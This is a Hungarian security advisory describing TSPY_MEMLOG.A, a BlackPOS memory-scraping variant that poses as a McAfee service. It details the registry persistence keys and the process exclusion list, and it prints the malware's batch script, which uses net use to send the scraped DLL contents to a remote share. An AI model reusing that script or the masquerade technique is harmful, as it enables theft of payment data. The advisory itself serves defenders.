Kémprogram TSPY_MEMLOG.A

CH azonosító

CH-11565

Angol cím

TSPY_MEMLOG.A

Felfedezés dátuma

2014.08.28.

Súlyosság

Alacsony

Érintett rendszerek

Microsoft

Érintett verziók

Windows 2000, Windows Server 2003, Windows XP (32-bit, 64-bit), Windows Vista (32-bit, 64-bit), Windows 7 (32-bit, 64-bit)

Összefoglaló

Ez a kártékony program a BlackPOS új variánsa, melynek célpontjai főként lakossági bankszámlák. A program egy antivírus szoftver szolgáltatásának álcázza magát, így rejtőzködve a számítógépen.

Ez a kémprogram egyéb kártékony kód letöltéseként, vagy egy fertőzött weboldal látogatásával kerül a számítógépre.

Leírás

A kémprogram bemásolja a következő komponens állományokat:

  • {malware path}t.bat – végrehajtás után törlésre kerül
  • t:tempdotnetNDP45-KB2737084-x86.exe – a McTrayErrorLogging.dll file bizonyos részeit tartalmazza
  • {malware path}McTrayErrorLogging.dll – a memória bizonyos részeit tartalmazza

A program regisztrálja magát egy rendszer szolgáltatásként, hogy biztosítsa az automatikus végrehajtását minden rendszerindításkor, ezért létrehozza az alábbi regisztrációs bejegyzéseket:

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcImagePath = “{malware path and filename} -service”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcDisplayName = “McAfee Framework Management Instrumentation”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcObjectName = “LocalSystem”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcStart = “2”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcType = “10”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcErrorControl = “1”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcDescription = “Provides systems management information to and from McAfee Framework Objects”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcSecuritySecurity = “{value}”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanworkstationDependOnService = “mcfmisvc”

A program regisztrálja magát egy rendszer szolgáltatásként, hogy biztosítsa az automatikus végrehajtását minden rendszerindításkor, ezért létrehozza az alábbi regisztrációs kulcsot:

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvc

A kémprogram a következő utasításokat ismeri:

  • -start
  • -stop
  • -install
  • -uninstall
  • -service

Beolvassa a memóriában található összes folyamatot, kivéve az alábbiakat:

  • smss.exe
  • csrss.exe
  • wininit.exe
  • services.exe
  • lsass.exe
  • svchost.exe
  • winlogon.exe
  • sched.exe
  • spoolsv.exe
  • System
  • conhost.exe
  • ctfmon.exe
  • wmiprvse.exe
  • mdm.exe
  • taskmgr.exe
  • explorer.exe
  • RegSrvc.exe
  • firefox.exe
  • chrome.exe

A t.bat komponens bemásolja a McTrayErrorLogging.dll tartalmát a t:tempdotnetNDP45-KB2737084-x86.exe fájlba. Ezt a támadó arra használja, hogy hozzáférést kapjon a megosztott géphez egy adott felhasználón keresztül, hogy fájlt küldhessen át.

A következő parancsokat tartalmazza:

set src=t:tempdotnetNDP45-KB2737084-x86.exe
net use t: \{BLOCKED}.{BLOCKED}.2.153d$ {BLOCKED}! /user:{BLOCKED}0.{BLOCKED}4.2.{BLOCKED}3{BLOCKED}1
if exist %src% (
type McTrayErrorLogging.dll >> t:tempdotnetNDP45-KB2737084-x86.exe.del /F /Q McTrayErrorLogging.dll
)
net use t: /DEL /yes
del /F /Q t.bat

A kémprogramot a következő neveken tartják még nyílván: Troj/Agent-AING (Sophos), W32/Zbot.QB.gen!Eldorado (FProt), Trojan-FEJZ!B57C5B49DAB6 (McAfee)

Megoldás

Frissítse az antivírus szoftverét.

Az eltávolításhoz szükséges információk a hivatkozásban találhatók.


Legfrissebb sérülékenységek
CVE-2019-11001 – Reolink Multiple IP Cameras OS Command Injection sebezhetősége
CVE-2021-40407 – Reolink RLC-410W IP Camera OS Command Injection sebezhetősége
CVE-2024-20767 – Adobe ColdFusion Improper Access Control sebezhetősége
CVE-2024-55956 – Cleo Multiple Products Unauthenticated File Upload sebezhetősége
CVE-2024-50623 – Cleo Multiple Products Unrestricted File Upload sebezhetősége
CVE-2024-49138 – Windows Common Log File System Driver Elevation of Privilege sebezhetősége
CVE-2024-11639 – Ivanti CSA sérülékenysége
CVE-2024-42449 – Veeam Service Provider Console sérülékenysége
CVE-2024-42448 – Veeam Service Provider Console sérülékenysége
CVE-2024-42327 – Zabbix SQLi sérülékenysége
Tovább a sérülékenységekhez »